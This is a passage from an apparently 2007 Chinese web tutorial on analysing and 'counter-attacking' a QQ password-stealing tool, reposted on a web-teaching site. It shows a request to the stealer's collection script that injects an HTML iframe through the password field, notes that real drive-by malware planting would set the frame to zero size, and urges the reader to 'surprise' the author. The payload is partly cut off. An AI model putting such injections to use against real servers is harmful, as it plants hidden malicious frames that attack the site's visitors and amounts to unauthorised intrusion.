找出安全漏洞 QQ盗号软件后门分析与反击
2007-11-28 19:13:02 来源:网页教学网 站长整理
再次证明对提交的数据是无任何限制的...我们完全可以自己发挥想象.插入任何代码都可以...
如果想反挂马的话..我们就可以提交以下数据
网页教学网
| 以下是引用片段: http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=<iframe%20&# ... 20width=480%20height=480></iframe> |
图14
网页教学网
当然我这里把width和height设置为480只是为了方便演示..实际挂马中要改为0
好了..现在我们就可以给作者一个惊喜去了..图15
下一篇:不间断连续向上滚动的图片特效
文章评论
共有 0 位网友发表了评论 查看完整内容